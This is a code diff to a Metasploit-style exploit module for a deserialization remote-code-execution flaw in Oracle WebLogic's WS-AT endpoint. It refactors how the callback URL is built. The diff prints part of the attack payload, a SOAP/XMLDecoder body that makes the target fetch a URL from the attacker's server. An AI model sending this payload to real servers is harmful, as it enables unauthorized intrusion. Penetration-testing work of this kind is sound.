Use geturi instead of building it ourselves

Author: kkirsche

modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

@@ -111,13 +111,12 @@ def exploit_process_builder_payload
   # from the target machine.
   #
   def check_process_builder_payload
-    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java version="1.8" class="java.beans.XMLDecoder">
         <object id="url" class="java.net.URL">
-          <string>#{return_request_url.encode(xml: :text)}</string>
+          <string>#{get_uri.encode(xml: :text)}</string>
         </object>
         <object idref="url">
           <void id="stream" method = "openStream" />
@@ -140,19 +139,6 @@ def on_request_uri(cli, request)
     @received_request = true
   end
 
-  #
-  # Identifies our public IP address so that we can make sure to include it instead of 0.0.0.0
-  # in our payload.
-  #
-  def lookup_actual_host()
-    # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
-      Rex::Socket.source_address('50.50.50.50')
-    else
-      datastore['SRVHOST']
-    end
-  end
-
   #
   # The exploit method connects to the remote service and sends a randomly generated string
   # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive